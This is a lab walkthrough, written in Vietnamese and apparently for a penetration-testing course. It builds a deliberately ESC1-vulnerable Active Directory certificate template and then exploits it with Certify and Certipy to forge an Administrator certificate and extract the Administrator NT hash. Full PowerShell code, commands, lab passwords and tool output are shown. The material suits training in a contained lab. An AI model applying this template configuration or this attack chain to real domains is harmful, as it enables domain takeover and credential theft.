--- # System prepended metadata title: Tích hợp Lab5.3 --- # Tích hợp Lab5.3 ## I. Kế Hoạch Tổng Thể ### Giai Đoạn 1: Setup DC01 (hiboxy.com) - Xác nhận CA tên và cấu hình - Tạo user `bgreen` với password `Password1` - Tạo template `UserAuthenticationCertificate` với cấu hình ESC1 vulnerable ### Giai Đoạn 2: Setup Windows 10 (Attacker) - Cấu hình DNS - Xác nhận Certify.exe có sẵn trong `\Tools\` - Chạy Certify để ra kết quả giống workbook ### Giai Đoạn 3: Setup Slingshot Linux (Attacker) - Xác nhận Certipy đã cài - Chạy Certipy find, req, auth - Lấy NT hash của Administrator ## II. Thực hiện ### Giai đoạn 1: Tạo Template ESC1 Vulnerable Trên DC01 - Tạo template `UserAuthenticationCertificate` với cấu hình ESC1: ```powershell= $ConfigContext = ([ADSI]"LDAP://RootDSE").configurationNamingContext $TemplateContainer = [ADSI]"LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$ConfigContext" # Lấy base template $BaseTemplate = $TemplateContainer.Children | Where-Object {$_.cn -eq "User"} # Tạo template mới $NewTemplate = $TemplateContainer.Create("pKICertificateTemplate", "CN=UserAuthenticationCertificate") # Copy từng attribute cụ thể từ User template $NewTemplate.Put("flags", $BaseTemplate.psbase.Properties["flags"].Value) $NewTemplate.Put("revision", $BaseTemplate.psbase.Properties["revision"].Value) $NewTemplate.Put("pKIDefaultKeySpec", $BaseTemplate.psbase.Properties["pKIDefaultKeySpec"].Value) $NewTemplate.Put("pKIKeyUsage", $BaseTemplate.psbase.Properties["pKIKeyUsage"].Value) $NewTemplate.Put("pKIMaxIssuingDepth", $BaseTemplate.psbase.Properties["pKIMaxIssuingDepth"].Value) $NewTemplate.Put("pKICriticalExtensions", $BaseTemplate.psbase.Properties["pKICriticalExtensions"].Value) $NewTemplate.Put("pKIExpirationPeriod", $BaseTemplate.psbase.Properties["pKIExpirationPeriod"].Value) $NewTemplate.Put("pKIOverlapPeriod", $BaseTemplate.psbase.Properties["pKIOverlapPeriod"].Value) $NewTemplate.Put("pKIExtendedKeyUsage", $BaseTemplate.psbase.Properties["pKIExtendedKeyUsage"].Value) $NewTemplate.Put("pKIDefaultCSPs", $BaseTemplate.psbase.Properties["pKIDefaultCSPs"].Value) $NewTemplate.Put("msPKI-Private-Key-Flag", $BaseTemplate.psbase.Properties["msPKI-Private-Key-Flag"].Value) $NewTemplate.Put("msPKI-Minimal-Key-Size", $BaseTemplate.psbase.Properties["msPKI-Minimal-Key-Size"].Value) $NewTemplate.Put("msPKI-Template-Schema-Version", 2) $NewTemplate.Put("msPKI-Template-Minor-Revision", $BaseTemplate.psbase.Properties["msPKI-Template-Minor-Revision"].Value) $NewTemplate.Put("msPKI-Cert-Template-OID", "1.3.6.1.4.1.311.21.8.$(Get-Random -Minimum 1000000 -Maximum 9999999).$(Get-Random -Minimum 1000000 -Maximum 9999999)") # Set ESC1 vulnerable values $NewTemplate.Put("displayName", "UserAuthenticationCertificate") $NewTemplate.Put("msPKI-Certificate-Name-Flag", 1) # ENROLLEE_SUPPLIES_SUBJECT $NewTemplate.Put("msPKI-Enrollment-Flag", 40) # INCLUDE_SYMMETRIC_ALGORITHMS + PUBLISH_TO_DS $NewTemplate.Put("msPKI-RA-Signature", 0) # No signatures required $NewTemplate.SetInfo() Write-Host "Template created successfully!" ``` - Set Permissions Cho Domain Users ```powershell= # Lấy template vừa tạo $ConfigContext = ([ADSI]"LDAP://RootDSE").configurationNamingContext $TemplateContainer = [ADSI]"LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$ConfigContext" $NewTemplate = $TemplateContainer.Children | Where-Object {$_.cn -eq "UserAuthenticationCertificate"} # Lấy SID của Domain Users $DomainUsersSID = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1165364801-2165540956-2109386109-513") # Set quyền Enroll cho Domain Users $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule( $DomainUsersSID, [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight, [System.Security.AccessControl.AccessControlType]::Allow, [GUID]"0e10c968-78fb-11d2-90d4-00c04f79dc55" ) $NewTemplate.psbase.ObjectSecurity.AddAccessRule($ACE) $NewTemplate.psbase.CommitChanges() Write-Host "Permissions set successfully!" ``` - Publish Template Lên CA ```powerhell= # Publish template lên CA $CAName = "DC01.hiboxy.com\hiboxy-CA01-CA" certutil -setcatemplates +UserAuthenticationCertificate ``` - Kiểm tra kết quả: `certutil -catemplates` ![image](https://hackmd.io/_uploads/S1eNkxfKWl.png) ### Giai đoạn 2: Setup Windows 10 (Attacker) - Cập nhật DNS rule với IP đúng của DC: ```powershell= # Xóa rule cũ Get-DnsClientNrptRule | Where-Object {$_.Namespace -contains "hiboxy.com"} | Remove-DnsClientNrptRule -Force # Thêm rule mới trỏ về DC01 = 10.130.10.10 Add-DnsClientNrptRule -Namespace "hiboxy.com" -NameServers 10.130.10.10 # Kiểm tra DNS Resolve-DnsName hiboxy.com Resolve-DnsName dc01.hiboxy.com ``` ![image](https://hackmd.io/_uploads/rJj2eeGFZl.png) - Dùng powershell với admin chạy lệnh : `runas /user:hiboxy.com\bgreen /netonly cmd.exe` với password : `Password1` - Trong CMD mới vừa mở (của bgreen) mục tiêu Chạy Certify - List CAs : `\Tools\Certify.exe cas /domain:hiboxy.com` ![image](https://hackmd.io/_uploads/ryad-xfYbx.png) - Tìm Vulnerable Templates : `\Tools\Certify.exe find /vulnerable /domain:hiboxy.com` ![image](https://hackmd.io/_uploads/B13T-lzt-l.png) ### Giai đoạn 3: Slingshot Linux - Chạy lệnh ở terminal : `certipy find -u bgreen@hiboxy.com -password Password1 -dc-ip 10.130.10.10` ![image](https://hackmd.io/_uploads/rJFQMeGF-x.png) - Xem Template UserAuthenticationCertificate - `cat *_Certipy.txt | grep -A 18 UserAuthenticationCertificate` - `cat *_Certipy.txt | grep -A 40 UserAuthenticationCertificate` - `grep "CA Name" *_Certipy.txt` - Kết quả : ```powershell= sec560@slingshot:~$ sudo su root@slingshot:/home/sec560# cat *_Certipy.txt | grep -A 18 UserAuthenticationCertificate Template Name : UserAuthenticationCertificate Display Name : UserAuthenticationCertificate Certificate Authorities : hiboxy-CA01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : AutoEnrollment PublishToDs Private Key Flag : ExportableKey Extended Key Usage : Client Authentication Secure Email Encrypting File System Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks root@slingshot:/home/sec560# cat *_Certipy.txt | grep -A 40 UserAuthenticationCertificate Template Name : UserAuthenticationCertificate Display Name : UserAuthenticationCertificate Certificate Authorities : hiboxy-CA01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : AutoEnrollment PublishToDs Private Key Flag : ExportableKey Extended Key Usage : Client Authentication Secure Email Encrypting File System Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : HIBOXY.COM\Domain Users Object Control Permissions Owner : HIBOXY.COM\Enterprise Admins Full Control Principals : HIBOXY.COM\Domain Admins HIBOXY.COM\Local System HIBOXY.COM\Enterprise Admins Write Owner Principals : HIBOXY.COM\Domain Admins HIBOXY.COM\Local System HIBOXY.COM\Enterprise Admins Write Dacl Principals : HIBOXY.COM\Domain Admins HIBOXY.COM\Local System HIBOXY.COM\Enterprise Admins Write Property Principals : HIBOXY.COM\Domain Admins HIBOXY.COM\Local System HIBOXY.COM\Enterprise Admins [!] Vulnerabilities ESC1 : 'HIBOXY.COM\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication 1 Template Name : KerberosAuthentication root@slingshot:/home/sec560# grep "CA Name" *_Certipy.txt CA Name : hiboxy-CA01-CA ``` - Set up DNS ```powershell= echo "nameserver 10.130.10.10" | sudo tee /etc/resolv.conf nslookup dc01.hiboxy.com nslookup hiboxy.com ``` - Request Certificate Giả Mạo Administrator ```powershell= certipy req -username bgreen@hiboxy.com -password Password1 \ -ca hiboxy-CA01-CA \ -template UserAuthenticationCertificate \ -upn administrator@hiboxy.com \ -target 10.130.10.10 ``` - Kết quả : ```powershell= root@slingshot:/home/sec560# certipy req -username bgreen@hiboxy.com -password Password1 \ > -ca hiboxy-CA01-CA \ > -template UserAuthenticationCertificate \ > -upn administrator@hiboxy.com \ > -target 10.130.10.10 Certipy v4.4.0 - by Oliver Lyak (ly4k) /usr/local/lib/python3.6/dist-packages/OpenSSL/_util.py:6: CryptographyDeprecationWarning: Python 3.6 is no longer supported by the Python core team. Therefore, support for it is deprecated in cryptography. The next release of cryptography will remove support for Python 3.6. from cryptography.hazmat.bindings.openssl.binding import Binding [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 5 [*] Got certificate with UPN 'administrator@hiboxy.com' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx' ``` - Lấy NT Hash của Administrator : `certipy auth -pfx administrator.pfx -dc-ip 10.130.10.10` ```powershell= root@slingshot:/home/sec560# certipy auth -pfx administrator.pfx -dc-ip 10.130.10.10 Certipy v4.4.0 - by Oliver Lyak (ly4k) /usr/local/lib/python3.6/dist-packages/certipy/lib/certificate.py:13: CryptographyDeprecationWarning: Python 3.6 is no longer supported by the Python core team. Therefore, support for it is deprecated in cryptography. The next release of cryptography will remove support for Python 3.6. from cryptography import x509 [*] Using principal: administrator@hiboxy.com [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@hiboxy.com': aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33 root@slingshot:/home/sec560# ``` - Hoàn thành lab 5.3 với hướng dẫn từ workbook !!!